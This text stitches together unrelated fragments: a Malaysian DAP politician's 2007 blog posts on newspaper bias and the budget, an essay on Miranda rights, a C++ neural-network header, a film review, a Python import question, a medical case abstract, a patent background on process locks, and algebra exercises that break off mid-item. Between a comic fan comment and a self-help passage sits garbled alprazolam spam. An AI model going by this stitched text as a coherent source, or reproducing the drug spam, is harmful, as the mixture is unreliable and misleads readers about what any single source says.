but also subjecting it to a junior minister in the Malaysian cabinet. I will certainly like to see the Deputy Minister for Youth and Sports, Datuk Leow Tiong Lai to wave the Federal Constitution, as he promised to do at the MCA Youth General Assembly at both the Cabinet as well as the Parliament. Having failed to defend the Malaysian constitution when the Deputy Prime Minister, Datuk Seri Najib Abdul Razak declared Malaysia as having never been a secular state, will he redeem himself this time round? Or more likely, is it a case of chicken again? For that matter, why are all the BN component party parliamentarians so quiet on this issue? Some like Datuk Fu Ah Kiow even became apologists for their UMNO masters. Monday, September 24, 2007 Guys, if you want to know how the local mainstream media reports activities by the DAP, then there is no better example than what happened last week with regards to the case of Nurin Jazlin Jazimin who was brutally assaulted and murdered. See the image of the basket of flowers published on 19 September (Wed) on page 4 of The New Straits Times (NST) below? Well, the caption says "One family's message, one nation's grief for the brutal death of an unknown child." That for your information is an outright lie by the NST editors. The basket wasn't placed there by "one family" but by a delegation led by the DAP Secretary-General, Lim Guan Eng. Not only did they lie about the origins of the flower basket and its message, they also doctored the photo. On the top right hand corner of the message card is the telephone number of the florist (where the flower basket was bought) printed in large fonts (see picture of by The Sun below). It "disappeared". What I'm less certain about is the fact that at the bottom right corner of the message card, "Democratic Action Party" both in English and in Chinese was written. This may have been blocked by the bear, although whether it could have been blocked in its entirety is the question. The following is another picture on the same page, with 2 ladies who work for the DAP Rocket publication. You can see Sdr Ronnie Liu, myself and YB Teresa Kok in the background. NST has very responsibly captioned the picture as "A bouquet and a soft toy are left where the girl's body was found." Clearly, it was too much to ask for NST to publish pictures of the key DAP leaders placing condolence basket but is it ethical for NST to avoid crediting DAP members, even when they are not key leaders? If something as non-political as placing a condolence bouquet and expressing the anger of Malaysians at such brutality can demand such clearcut distortion of the truth in our venerable newspapers, then what can you expect when we raise other more "sensitive" issues such as ministerial and governmental corruption, abuse of powers and incompetence. For your information, the Chief Editor of NST was notified of the misdeed, but no response, apology nor correction was issued. The Sun too, placed the picture of the flower basket on its front page on Wednesday last week, headlined by the contents of the message card itself - "Malaysians will not let you die in vain." Again, there was no credit to the photo and no context provided. At least the paper didn't print a blatant lie or attempted to doctor the picture. However, credit must be given to the Sun for printing the context to the picture the next day, Thursday, after belatedly realising the mistake made, although no pictures were reprinted. And what about the largest circulating English daily, the Star? Well, a reporter was certainly assigned to the story, but unfortunately for her, since the story will place DAP in a positive light, her work went straight into the thrash can. I am actually highly sympathetic to the English press reporters who do turn up at our press conferences (not all, but some) but who would find that their efforts to file a story completely wasted. The only consolation? At least the Star didn't attempt to capitalise on the picture or tell a lie. They just pretended that it wasn't important enough to publish. Hence it is not surprising that many members of the public, particularly those who read either just the English or worse, the Malay dailies, think that the opposition parties like the DAP doesn't do much til election day. I can tell you with confidence that the party does a great deal throughout the year, all around the country. For the unbelievably limited resources that we have, we are clearly punching way above our weight. Unfortunately, our reach has been limited, with the exception of reaching out via the Chinese press which provides a little more room for us to publicise our views and activities. So, if you want positive change, let the newspapers and the Government know by writing to them, or voting "correctly" in the next general elections. Or even better, do your part by helping out with DAP's party activities or if you are in the Klang Valley, help me out. You know how to reach me ;) Tuesday, September 18, 2007 I'm a regular reader of Dr K J John's columns in Malaysiakini. I knew Dr John almost 10 years ago, when he was a senior vice-president at MIMOS, while I was a young fledging entrepreneur. Having dealt with him, he was certainly a man I strongly respected. He has also frequently made known his position on politics, whether in his columns or in his public talks, that he is not partial to any political parties, and will make decisions and choices during elections in accordance to his conscience. For the coming general elections, Dr John has made up his mind, as expressed in his latest article "Why I would not vote for BN". He gave 3 reasons: The issue of leadership integrity. I voted for the Pak Lah government at the last general election and even convinced all my friends to do so, simply because I believed in Pak Lah and all the promises he made. He has not delivered on many of his promises. Granted, five years is not enough, but surely the political will and intent will be visible by now, if there is any. I do not see it yet, having served as a government servant of 32 years. Neither Umno at the highest level nor MCA at the grassroots level (in my constituency) gives me confidence that Pak Lah, given another five years will and can make a difference. [...] My representatives at the grass-roots level have also let me down. During the 1999 elections, I brought both the Adun and my then future MCA MP to review the situation of the “rape of the green lung in my neighborhood.” Alas, the government cronies did what they wanted to do; they raped our 30-year-old green lung without even a proper hearing. [...] Sorry MCA representatives, even if Mr Ong Ka Ting personally appeals to me, I cannot vote one of yours as you are part of the problem. Local governance is at its worst ever. How can the government of the day be arbitrary in the “governance of the public spaces of life?” While Citizen Nades has been fighting through writing (exercising the power of the pen), it appears to no avail. [...] We are all part of the civil society that is pushing for change, and everyone has their roles. People like Jeff Ooi and myself have decided to take a stand via direct involvement in politics, while others like Dr John has made his views known to influence the vote of the public. It is clearly not enough for us to keep our views to ourselves, and vote for the party of our choice come the next general elections. To effect change, there must be a mass movement, and it involves everyone, yourself included. We need to ensure that the message gets spread, not just to our family members, but also to friends, neighbours and the community. You can do so by printing leaflets and dropping them into mailboxes (I can help), sending out mass emails to everyone in your address book, and raising these issues at breakfast, lunch, tea and dinner functions. This is our Malaysia, and its up to us to redeem the country. So, what is your stand? And more importantly, what are you going to do about it? Monday, September 17, 2007 I wrote this article on the Budget 2008 for Oriental Daily last week, asking "Where the Candies?" I'll be writing more on the Budget this week, as my schedules frees up a little ;) So watch this space ;). Thursday, September 13, 2007 This is probably the record week in terms of the number of speaking engagements for me. Six nights out of eight, it can't get much more than this. Phew! Well, I have 2 more Mandarin forums to go, one in Alor Star (!). Details are as follows: Tuesday, September 11, 2007 I wrote in Oriental Daily column two weeks back on quite a different topic from my usual spill, heh, on the Malaysian stock market. Given the volatility of the markets, caused to a large extent by the subprime mortgage crisis, what is the outlook for the Malaysian bourse? The title for my column can be roughly translated as "avoid gambling and you profit". Without going into details, the alternating daily disclosures of good and bad news is enough to give those who are weak in the heart a nervous breakdown. Given the absolute uncertainty of the medium term plus the gains made by the stock market to date, avoid the stock market unless you are prepared for a wild ride, and that means significant downside risks. What's the extent of downside risk? Well, some of you may remember a time where the only direction could have been up, the KLSE index tanked from 1,300 points to 270 points within less than 6 months in 1997/8. It may not have be as bad this time round, but it certainly takes only a 200 point drop to make you feel the pinch. Hence, given the unpredictability, any short-term purchase of shares is pretty much akin to the roll of the dice. And if you decide not to roll the dice, you have made a profit already ;) Hmm... there hasn't been much time for me to sit down and write down my thoughts on the disappointing budget in full (that means many many pages...). Sigh. I'll try to do this soon, before the entire interest in the Budget sort of fades away. ...if you happen to be a shareholder of that company, and so happened your tax bracket is lower than 27%... too bad, you’re screwed. If you’re a pensioner and hold a lot of shares, you’re wonderfully screwed. The proposal which was supposed to make us all feel very good is that EPF contributors will be allowed to withdraw balances from Account 2 to pay monthly housing instalments. Sounds like a good idea. But if you were to think properly… the government is basically allowing us… to use our own money… to pay for our own house. And we are supposed to feel thankful about it? You tell me… Who are the beneficiaries of the Prime Minister cum Finance Minister, Datuk Seri Abdullah Ahmad Badawi's 2008 Budget? What is the prospects like for the economy of the country? What did you receive from Pak Lah's budget? DAP has also launched our own version of the Malaysian budget - "Malaysian First: Unity Driven Equity, Growth & Innovation" focusing on the challenges of globalisation and the country's reliance on oil and gas revenues. (You can download the English and Chinese versions) To understand further on who benefits in the latest Malaysian budget, and to analyse Malaysia's economic prospects, DAP is organising an English forum on the 12th September 2007 at DAP Damansara Branch. The details of the forum are as follows: Friday, September 07, 2007 Looks like my post-budget work hasn't completed. So just some quick announcements here. There are going to be plenty of discussions and forums on the Government's Budget 2008, yes, the much touted pre-election budget today at 4pm (and I'll be stationed at the Parliament). For those who are interested to read the DAP version of the Budget, you can now download both the English version as well as the Chinese version. The Malay version is "work in progress". But for a start, here's what you can do to find out more this weekend: 1. SinChew Budget Discussion Forum (Mandarin) I'll be speaking tonight (yes, that's this evening!) on the Budget presented by the Prime Minister at the Sin Chew Jit Poh Auditorium in Petaling Jaya. The forum will be in Mandarin together with 3 other eminent speakers. Details are as follows: The first in a series of forums to be held by the DAP after the Prime Minister announces the budget will be on this Sunday (9th Sep) evening (7.30pm) at the KL & Selangor Chinese Assembly Hall. This one is a Mandarin forum: Wednesday, September 05, 2007 Hey guys, finally I've gotten my big project out of the way :) The 52-page DAP Malaysian First Budget 2008 is finally released to the public today, 2 days before Pak Lah's government announces theirs. I'm too overdosed with caffeine, accumulated over the past 2-3 weeks at this point in time to write too much about it now. But you can read the latest reports by Malaysiakini in English and in Chinese. Plus, you can download the full Budget document, entitled "Malaysian First: Unity Driven Equity, Growth & Innovation" to get a firsthand account ;). Know that we have worked on the budget with overwhelmingly limited resources both with regards to people and information and we are more than happy to welcome additional suggestions. OK, got to go get my sleep now. Will certainly post more on the Budget in the coming days. ;) UBAH Rocket Style Twitter Updates Facebook Profile Google+ Followers About Me I was elected in March 2008, the Member of Parliament for Petaling Jaya Utara under the Democratic Action Party (DAP). I'm also the DAP National Publicity Secretary, as well as the investment liaison officer for the Penang Chief Minister based in the Klang Valley. Before joining politics full-time in January 2007, I was the CEO and founder of a Malaysian IT company, publicly listed in Singapore. I divested all my shares in the company to be able to serve the community and take part in socio-political affairs of Malaysia. I've always had faith that there has been a guardian angel looking after me all these while - my personal well-being, my education, my career. Some will call it "God's will", some "fate" while some others, "destiny". I strongly believe that it is time for me to repay the kindness and fortune showered on me by my family, the society and of course, not forgetting, my guardian angel. :-)
Nganbam Sweety Devi Nganbam Sweety Devi (born in 1 January 1998) is a women international footballer from Manipur. She also plays for Eastern Sporting Union club in Indian Women's League. She started playing for the national team in AFC Cup Qualifiers. References Category:Indian women's footballers Category:1998 births Category:Living people Category:Women's association football defenders Category:Eastern Sporting Union players Category:Footballers from Manipur Category:India women's international footballers
Miranda warnings are essential On March 1, 1966, the case of Miranda v. Arizona was argued in the Supreme Court, and was decided on June 13, 1966. The issue was that prior to the time of arrest and any interrogation of a person suspected of a crime, he/she must be told that he/she has: “the right to remain silent, the right to legal counsel, and the right to be told that anything he/she says can be used in court against” him/her. Also, if the accused person confesses to the authorities, the prosecution must prove to the judge that the defendant was informed of them and knowingly waived those rights, before the confession can be introduced in the defendant’s criminal trial. The warnings are known as Miranda Rights. Although there are crusades against Miranda rights suggesting that it significantly harmed law enforcement efforts in this country. The Miranda rights have its advantages and should remain its continuum because of ample amount of false convictions and to stop abuse of power. Many argue that the cost of Miranda rights outweighs the benefits. Advocates of letting Miranda go, main arguments are over the number of lost confessions. To them it’s the belief that fewer people will confess if police warn them of their right to silence. Advocates would say that this procedure allows dangerous criminals back into the street. But, based on small percentages, it has been argued that Miranda rights have had only a minimal effect on law enforcement. This warning statement has been in place for years and has been met with extreme success. “It revolutionized criminal interrogations and was part of a larger revolution in the nature of both the Supreme Court and the federal system generally.” This decision took power out of the hands of law officials and placed it in the hands of judges. Before confessions were being obtained by coercion and police brutality. “What has proven to be a problem is the exclusionary rule feature of Miranda. That is the feature that throws out perfectly voluntary confession” Paul Cassell. It’s odd that this controversy has even arisen, because the Miranda Rights works for both sides. It gives the police a clear set of rules to follow. It makes it easier to admit confessions at trial, as long as the police obey the rules. It is fair to defendants because it informs them of their rights. It protects the basic fifth amendment right against self- incrimination. Miranda rights in the twentieth century has reduced police misconduct, preserved our independence, avoid false confessions and just overall is fair. It is the belief that these rights are of the utmost importance to every American citizen. We must decide on the constitutionality of these rights as critics of the constitution as well as people who may be affected by our own decisions. They must do a more thorough job so as to avoid unnecessary pain and disruption to lives of people who may be falsely accused and to be absolutely sure that they have the right person in custody. Not being aware of your rights is like being thrown into the driver’s seat of a car having no idea as to which pedal is the accelerator and which is the brake. The problem with this way of thinking is that these people are not just suspects in a crime; they are people and should be treated as such. Miranda warnings are a safety net. Here, the court ruled that suspects have the right to remain silent and that prosecutors may not use statements made by suspects in police custody, unless they have been informed of their rights first. These advisements have kept innocent people out of prison and therefore not only saved the lives and futures of those people and their families but also saved this country a significant amount of money that can be put to use elsewhere. There are laws that 90% of the country is unaware of. The Supreme Court is now in the process of hearing arguments, and reviewing cases to decide if the Miranda rights are really constitutional, and therefore, enforceable. Some believe that it is not required to recite this warning when a suspect is arrested, rather it is required when and if the police decide to interrogate the suspect. It is the privilege of that suspect to either wave these rights or to remain silent and request that a lawyer be present at all times. The consequences were seen in Smith v. Illinois in which Smith was arrested for armed robbery, he was taken to an interrogation room and read his rights under Miranda v. Arizona. When officials asked whether he understood his right to a lawyer and to have a lawyer present during the questioning, he replied: “Uh, yeah. I’d like to do that.” However, rather than stop the interrogation to meet Smiths request, the interrogating officers continued the interrogation; ultimately, he made incriminating statements. Smith’s motion to suppress the statements was denied, and he was convicted of armed robbery. His conviction was affirmed by both the Illinois Appellate Court and the Illinois Supreme Court, which held that his responses to continued police questioning made his initial request for a lawyer ambiguous and that the officers therefore were not required to terminate their questioning. Once Smith clearly stated he did want a lawyer all other questions shouldn’t have been asked afterward. This case brings up a strong point that not enough suspects use their right to cut off questioning after it has begun. This in fact is an important Miranda decision. Despite the fact that some people argue against it, in many others view It serves its purpose and we should also be reminded that the Miranda rights prevents self-incrimination in violation of the Fifth Amendment to the U. S. Constitution Plagiarism Warning: Essays from FreeOnlineResearchPapers.com are for example ONLY. Do NOT submit papers from FreeOnlineResearchPapers.com as your own. If you choose to use information obtained from our essays, it is your responsibility to cite it. Free Online Research Papers is made possible by people like you submitting and commenting on research papers, research articles, book reviews, poetry, and creative writing pieces.
//======================================================================= // Copyright (c) 2014-2020 Baptiste Wicht // Distributed under the terms of the MIT License. // (See accompanying file LICENSE or copy at // http://opensource.org/licenses/MIT) //======================================================================= #pragma once #include "dll/base_conf.hpp" #include "dll/contrastive_divergence.hpp" #include "dll/watcher.hpp" #include "dll/util/tmp.hpp" namespace dll { /*! * \brief Describe a RBM. * * This struct should be used to define a RBM either as standalone or for a DBN. * Once configured, the ::layer_t member returns the type of the configured RBM. */ template <size_t visibles, size_t hiddens, typename... Parameters> struct rbm_desc { static constexpr size_t num_visible = visibles; ///< The number of visible units static constexpr size_t num_hidden = hiddens; ///< The number of hidden units /*! * A list of all the parameters of the descriptor */ using parameters = cpp::type_list<Parameters...>; /*! * \brief The batch size for training this layer */ static constexpr size_t BatchSize = detail::get_value_v<batch_size<1>, Parameters...>; /*! * \brief The type of visible unit */ static constexpr unit_type visible_unit = detail::get_value_v<visible<unit_type::BINARY>, Parameters...>; /*! * \brief The type of hidden unit */ static constexpr unit_type hidden_unit = detail::get_value_v<hidden<unit_type::BINARY>, Parameters...>; /*! * \brief The sparsity penalty for pretraining */ static constexpr sparsity_method Sparsity = detail::get_value_v<sparsity<sparsity_method::NONE>, Parameters...>; /*! * The type used to store the weights */ using weight = detail::get_type_t<weight_type<float>, Parameters...>; /*! * The type of the trainer to use to train the RBM */ template <typename RBM> using trainer_t = typename detail::get_template_type<trainer_rbm<cd1_trainer_t>, Parameters...>::template value<RBM>; /*! * The type of the watched to use during training */ template <typename RBM> using watcher_t = typename detail::get_template_type<watcher<default_rbm_watcher>, Parameters...>::template value<RBM>; static_assert(num_visible > 0, "There must be at least 1 visible unit"); static_assert(num_hidden > 0, "There must be at least 1 hidden unit"); //Make sure only valid types are passed to the configuration list static_assert( detail::is_valid_v<cpp::type_list<momentum_id, verbose_id, batch_size_id, visible_id, hidden_id, weight_decay_id, init_weights_id, sparsity_id, trainer_rbm_id, watcher_id, weight_type_id, shuffle_id, free_energy_id, dbn_only_id, nop_id, clip_gradients_id>, Parameters...>, "Invalid parameters type for rbm_desc"); static_assert(BatchSize > 0, "Batch size must be at least 1"); static_assert(Sparsity == sparsity_method::NONE || hidden_unit == unit_type::BINARY, "Sparsity only works with binary hidden units"); /*! * The layer type */ using layer_t = rbm_impl<rbm_desc<visibles, hiddens, Parameters...>>; private: template <typename... Args> struct dyn_layer_t_impl { using sequence = remove_type_id<batch_size_id, Args...>; using type = typename build_dyn_layer_t<dyn_rbm_impl, dyn_rbm_desc, sequence, Args...>::type; }; public: /*! * The layer type */ using dyn_layer_t = typename dyn_layer_t_impl<Parameters...>::type; }; /*! * \brief Describe a RBM. * * This struct should be used to define a RBM either as standalone or for a DBN. * Once configured, the ::layer_t member returns the type of the configured RBM. */ template <size_t visibles, size_t hiddens, typename... Parameters> using rbm = typename rbm_desc<visibles, hiddens, Parameters...>::layer_t; } //end of dll namespace
Your mission, Christopher McQuarrie (Jack Reacher, The Way of the Gun), should you choose to accept it, is to try and continue the momentum created by Brad Bird in the previous series-revising Mission: Impossible – Ghost Protocol. Up to the challenge? I reckon so! The Overview Rogue Nation picks up where Ghost Protocol left off, with Ethan Hunt (Tom Cruise) trying to hunt down a whole bunch of rogues who are trying to destroy the IMF (Impossible Missions Force) for good. The already tarnished reputation of the IMF continues to come under fire from CIA Director Alan Hunley (Alec Baldwin) who considers them a liability, calling Hunt an “arsonist and fireman at the same time”. Enlisting the help of former technician and now field agent, Benji Dunn (Simon Pegg), Hunt must use all of his skills in order to stop the Syndicate, an international rogue organisation who will stop at nothing until they see the IMF destroyed for good. Hunt also has to put his faith in the “is she rogue”, or “is she not” former MI6 agent Ilsa Faust (Rebecca Ferguson). As the title would suggest, there are a plethora of rogues, both good and bad at work. There is double-crossing, false leads and tons of suspense, as we try and work out who Ethan Hunt really can trust. The Good Based on what we have seen in the previous four M:I films, we know there are going to be awesome action sequences, and some of the ones seen in this film are amongst the very best. The opening scene with Ethan Hunt hanging off the side of a plane is thrilling, and a great way to set the tone for the rest of the film. It doesn’t really have any relevance on the storyline, but boy is it fun! And that sums up this film really: amazing action sequences but it doesn’t take itself too seriously. Another action highlight was set against the backdrop of the opera, Turandot. Hunt lets Benji think he has won free tickets to the opera in Vienna, when really he needs his help tracking the leader of the Syndicate, Solomon Lane (Sean Harris). Hunt believes Lane is targeting an Austrian dignitary who will be in attendance, and must use all of his espionage skills in order to track Lane’s marksman before he (or she?) strikes. Without giving too much away, this scene is fantastic, and as beautifully orchestrated as the music which accompanies it. Tom Cruise is great as always, and it is still hard to believe that he does most of his own stunts at the age of 53! The supporting cast are equally good, particularly Simon Pegg, who provides a great comedic counterpart to the more serious Hunt. Rebecca Ferguson is also excellent as the rogue MI6 agent, Ilsa Faust. I found myself constantly trying to figure out whether she could be trusted or not, and this created a great deal of suspense; and it is left open to the audience’s interpretation right up until the end of the film. The Bad Whether or not they deliberately wanted there to be several red herrings and to keep you guessing in terms of how it was going to end, either way I felt like it was going to end about 45 minutes before it did. This made it a slight struggle to get through the final act of the film with the same enthusiasm I had had earlier. The pacing was off at points as well, with high-intensity action scenes followed by slow and not entirely relevant dialogue, which was a bit of an anti-climax. An example of this was after the motorbike chase through Morocco. One of the best action sequences in the film, but the end felt abrupt and this was slightly jarring. The plot also gets a bit muddled at some points. Our heroes must break into a secure power station in order to find a list of all Syndicate agents, and halfway through the heist being explained, and the scenes themselves, I had forgotten why they were doing all this in the first place! The double-crossing is a little hard to keep track of at times as well. This isn’t a ‘switch your brain off, dumb, fun’ action film in the same vein of the Fast & Furious franchise. That being said, the action sequences are enjoyable and the chemistry between the actors is enough to keep you interested, but you might leave scratching your head if you’re not concentrating! The Verdict I saw this movie and you should too because it was great fun to watch, with amazing action scenes and awesome stunts. The plot is slightly confusing, but when you look past that it is a highly enjoyable watch. In terms of the other films, I’d probably rank it 3rd, just behind Ghost Protocol, and the original Mission: Impossible. I haven’t watched the other films for a long time, but I didn’t feel that detracted from my enjoyment of the film. Maybe watch Ghost Protocol before you see this though, as there are some references to that film – particularly the IMF’s dalliances in Russia. So the question is, can whoever receives the proverbial Director baton make another great Mission Impossible film? Well, as Rogue Nation has proven, and as Benji says, “that doesn’t sound impossible!” Agree with everything I’ve said, or am I a terribly misguided idiot who has got it all wrong? Please let me know in the comments, and don’t forget to share as well.
Q: how to import or call a python module/class in other modules with different file paths I want to follow this structure for a WEB "WSGI pep 3333" API (educational purposes): /home/ `--app.py `--API_module/ `--__init__.py `--api.py `--exceptions.py `--modules/ `--default/ `--__init__.py `--default.py app.py calls API_module with something like: app = API_module.api() the api.py based on "HTTP GET requests" will load modules stored on directory named modules, for now, I am just loading a module named default. api.py looks like: import os import imp from exceptions import HTTPError, HTTPException class API(object): def __call__(self, env, start_response): self.env = env self.method = env['REQUEST_METHOD'] try: body = self.router() body.dispatch() except HTTPError, e: print 'HTTP method not valid %s' % e except, Exception e: print 'something went wrong' start_response(status, headers) yield body def router(): module_path = '/home/modules/default/default.py' if not os.access(module_path, os.R_OK): raise HTTPException() else: py_mod = imp.load_source('default', '/home/modules/default/default.py' return py_mod.Resource(self) and default.py contains something like: class Resoure(object): def __init__(self, app): self.app = app def dispatch(self): raise HTTPException() So far I can import dynamically the modules but if I want to raise an exception from the default.py module I get an: global name 'HTTPException' is not defined Therefore I would like to know, how to take advantage of the API_module/exceptions and use them in all the dynamically modules. Any ideas, suggestions comments are welcome. A: It's a matter of sys.path. In your setup, since your API_module is included from app.py you should have the root of your application in your sys.path so you should just include the API_module in the usual way: from API_module import exceptions or from API_module.exceptions import * based on how you use it. Btw, i suggest you use pymod = __import__('modules.default.default', fromlist=['']) and put an __init__.py' file in themodules/` root directory.
An entire 120-year-old, two-story, three-bedroom, two-bathroom brick house in a not-so-bad neighborhood, with a full, dry basement, hardwood floors, and a roof that doesn't appear to leak, a garage/shed out back, and a back yard you could technically plant food in, or fence in for the dog. Longish walking distance from my mother's house, even closer to the library, and 1.8 miles from my sister's office. As I told my sister, the bricks alone are probably worth $8000, if you could bear to demolish such a nice old place. The only possible drawback is that there is no work to be found anywhere in the vicinity. Since this is equivalent to the situation here in Puerto Rico, it's demonstrably not a problem for me. The only real stumbling block we have -- two, really -- is that we are quailing before the idea of moving again when we finally have all our stuff in one place in the world, and our daughter is 14. She's just really started making good friends here, and while the thought of being close to family is tempting, it's not going to be easy for her. I showed her she'd have her own door, though, and she said, "Ooh." And the high school has a variety of AP classes, plus they have dual enrollment dealies with two local colleges. So she's weakening. It's a big decision, but that whole "live for free" aspect is really attractive -- we could use the rent we're not paying to save up a down payment on a house in Budapest, for instance. Then we'd have attained our long-term goal of having solid bases in both countries. 'Am a fanboy who just wants to show a huge sense of appreciation and thanks to "THE" Mr.Lah. This comment comes all the way from the wretched archipelago of the Philippines. And yes, there are people who here who have a good-fucked-up sense of humor.Web comics like chopping-block keep the cultured comic fanboy sane and amused in an otherwise, dirt boring work environment.Seeing the fresh posts of CB this 2009 gives me something to look forward to, in my day-to-day drone like work days. With butcher's cleaver in one hand & friendly handshake in the other, I'm spreading the good word of Choppingblock to all my friends. Sorry for selection category to leave a speech for all about picture of alprazolam alprazolam dose Garland and alprazolam alprazolam 1mg GilbertTymnBaini: Make sure to talk with your healthcare provider before taking alprazolam with a seizure medication. Another facts: 1mg alprazolam Capac
While traveling recently, I stopped to have dinner at a Chinese buffet that claimed to have more than 100 items on the menu. I figured that with so many choices, I’d definitely find something delicious to eat. But as I looked over the buffet, I discovered that most of the dishes were either swimming in gravy or oil, or were deep-fried. Since that’s not the type of meal I was looking for, I soon realized that my options weren’t as plentiful as I’d expected. A vision is a picture or idea you have in your mind of yourself, your business, or anything this is going to happen. A clear vision helps you pursue dreams and achieve goals; an idea of the future, a strong wish. A vision that is clear will open your mind to the endless possibilities of the future. A vision will help you to overcome obstacles in the way and helps you hold on when times are tough. A vision that is well defined helps you to focus and create a purpose that becomes your measurement for your success. If you do not have a vision of who you want to be, how you want to succeed or what you want out of life, you begin to lack drive and your life becomes just an order of events. A few years ago, I heard a wonderful story, which I’m very fond of telling. An elementary school teacher was giving a drawing class to a group of six-year-old children. At the back of the classroom sat a little girl who normally didn’t pay much attention in school. In the drawing class she did. For more than twenty minutes, the girl sat with her arms curled around her paper, totally absorbed in what she was doing. The teacher found this fascinating. Eventually, she asked the girl what she was drawing. Without looking up, the girl said, “I’m drawing a picture of God.” Surprised, the teacher said, “But nobody knows what God looks like.” Everyone has difficult times in their life, when obstacles seem to constantly get in the way and nothing goes to plan. It’s during these tough times that many of us fall victim to blaming everything and everyone around us for the challenges we’re facing and our lack of success in creating the life we desire. Maybe you’re in debt, stuck in a dead end job or your boss is constantly shouting at you and making you feel angry? Or perhaps your partner leaves you feeling frustrated and doesn’t give you the respect you deserve? It’s easy to blame what’s going on around us for our lack of happiness, bad mood and general discontent about the way life is going. But who is truly responsible for creating the life you desire? Whose life is it anyway? Have you taken responsibility for your life and what happens to you?
Can colonic inflammatory polyp with numerous immunoglobulin G4-positive plasma cells represent a colonic manifestation of immunoglobulin G4-related disease? A case report. We present an asymptomatic case of a 79-year-old Japanese man who had a 6 mm colonic inflammatory polyp with numerous immunoglobulin G4 (IgG4)-positive plasma cells. No symptoms or abnormal laboratory data, such as changes in serum IgG4 levels, were found at the time of diagnosis or during the 1 year of follow-up thereafter. Additionally, no diffuse/localized swelling or masses were found in organs, except for colonic polyps, by abdominal computed tomography 1 year prior to the polypectomy. Inflammatory myofibroblastic tumor was unlikely from the lack of spindle cell proliferation and ALK immunoreactivity. This is the first case of this colonic polyp in an asymptomatic person. This polyp could be probable for single organ manifestation of IgG4-related disease (IgG4-RD), according to the comprehensive diagnostic criteria for IgG4-RD published in 2012; however, colonic manifestation of IgG4-RD has not been clarified owing to its rarity, and colon-specific criteria for IgG4-RD have not been proposed. Thus, we could not definitively establish the colonic polyp as IgG4-RD. Therefore, careful clinicopathological evaluation is needed to reveal whether this colonic polyp represents a nonspecific inflammatory response or an early manifestation of IgG4-RD.
(CNN) – A grim milestone this week, as the nation commemorates the 13th anniversary of the 9/11 attacks. Some of those still grieving the losses of family members from that horrific day are also on a mission to declassify 28 pages from the congressional investigation into the attacks, pages specifically focused on the role of foreign governments in the al Qaeda plot. These 9/11 family members say President Obama personally promised he would declassify those 28 pages, but now they say the White House does not even acknowledge them, or their requests. CNN's Jake Tapper reports. Editors note: After the airing of our report, National Security Council spokesperson Caitlin Hayden issued this response: "Earlier this summer the White House requested that ODNI review the 28 pages from the joint inquiry for declassification. ODNI is currently coordinating the required interagency review and it is ongoing."
1. Field of the Invention The present invention relates to inter-process synchronization mechanisms in computer systems. More specifically, the present invention relates to a method and apparatus for implementing inter-process locks that provides for robust recovery in the event a process fails while holding a lock. 2. Related Art Computer systems often support multiple processes that can work together on a single computational task. One of the challenges in using multiple processes is to synchronize the processes so that they do not interfere with each other. This is typically accomplished through mutual exclusion locks (mutex locks), which are used to ensure that only one process at a time performs a particular task or has access to specific items of shared data. A process typically attempts to "acquire" a lock before executing a critical section of code or accessing specific items of shared data. If no other process presently holds the lock, the process acquires the lock by setting the lock to a locked state. After acquiring the lock, the process is free to execute the critical section of code or manipulate the items of shared data without interference from other processes. While the process holds the lock, other processes attempting to acquire the lock will "block" waiting for the lock, and will not be able to proceed until the lock is released. After the process completes the task, it releases the lock, thereby allowing other processes to acquire the lock. Mutual exclusion locks create complications for computer systems that operate robustly. Such "robust" computer systems are designed to continue processing even if some of the processes or processors involved in a computational task fail during program execution. If a process fails while holding a mutual exclusion lock, other processes attempting to acquire the lock will "hang," waiting for the failed process to release the lock. The computational task will consequently come to a halt. To remedy this problem, some computer systems simply release a lock if a process holding the lock fails. This allows other processes that are blocked on the lock to continue processing. However, the process that failed may have left the data protected by the lock in an inconsistent state. This may cause the remaining processes to produce an incorrect result or to fail at some time in the future. Other systems notify the remaining processes that the state protected by the lock was left in an inconsistent state when the process died. This allows the remaining processes to take action to make the state consistent again. However, the remaining processes may not be successful in making the state consistent again. In this case, the remaining processes will ultimately produce an incorrect result or will fail at some time in the future. What is needed is a method or an apparatus that provides robust recoverable locks that do not let other processes hang if a process holding a lock fails, and which allows the other processes to restore the state protected by the lock to a consistent state.
450, 620/9 Let -2*z**4 + 8066*z**3 + 33037120*z**2 + 24980697600*z = 0. Calculate z. -1360, 0, 6753 Suppose 620*x**3 + 23650405*x**2 + 19263255*x + 1144350 = 0. What is x? -38145, -3/4, -2/31 Suppose 4895*c**5 + 34440*c**4 - 145625*c**3 + 14330*c**2 + 196500*c + 7000 = 0. What is c? -10, -1, -35/979, 2 Suppose -4*p**5 - 288*p**4 + 6988*p**3 + 73432*p**2 - 901488*p - 2036320 = 0. Calculate p. -89, -13, -2, 10, 22 Factor -d**2/4 - 1157*d - 4241571/4. -(d + 1259)*(d + 3369)/4 Factor -3*m**3/7 + 12635832*m**2/7 - 1900766690025*m + 3801526159578. -3*(m - 2105971)**2*(m - 2)/7 Find z, given that -96*z**3 - 75668*z**2 - 1056016*z - 216720 = 0. -774, -14, -5/24 Find r, given that -4*r**4 - 1508*r**3 - 112312*r**2 - 827136*r - 1607040 = 0. -279, -90, -4 What is s in 2*s**5/7 + 1410*s**4/7 + 268022*s**3/7 + 7300806*s**2/7 + 50230976*s/7 - 57801216/7 = 0? -363, -311, -16, 1 Solve 4*a**3 + 13401916*a**2 - 53607716*a + 40205796 = 0 for a. -3350483, 1, 3 Factor 2*c**3/5 + 1976668*c**2/5 + 488400071104*c/5 - 976808048896/5. 2*(c - 2)*(c + 494168)**2/5 Solve 94*g**3/11 - 814978*g**2/11 + 797546*g/11 + 17338/11 = 0. -1/47, 1, 8669 Solve -8*j**4 - 463460*j**3 - 6651812172*j**2 + 1757434013504*j - 877053995776 = 0 for j. -29096, 1/2, 259 Let 51*a**4/2 - 15087*a**3/2 - 78750*a**2 - 200934*a - 33048 = 0. Calculate a. -6, -4, -3/17, 306 Let -r**3/2 + 533269*r**2/2 + 2133097*r/2 - 2666365/2 = 0. What is r? -5, 1, 533273 Find d such that -2*d**2 + 8828766*d + 8828768 = 0. -1, 4414384 Suppose -3*i**3 - 169119*i**2 + 14226915*i - 14057793 = 0. Calculate i. -56457, 1, 83 Suppose 2*n**3 - 4598*n**2 + 719648*n - 16117920 = 0. What is n? 27, 140, 2132 Factor -5*p**3 - 93265*p**2 - 458281075*p - 214885598375. -5*(p + 523)*(p + 9065)**2 Factor 3*z**2/2 + 4353*z/2 + 787302. 3*(z + 687)*(z + 764)/2 Find w, given that 3*w**4 + 831*w**3 - 111672*w**2 = 0. -376, 0, 99 Factor -s**2/6 + 4333949*s/6 + 5056282. -(s - 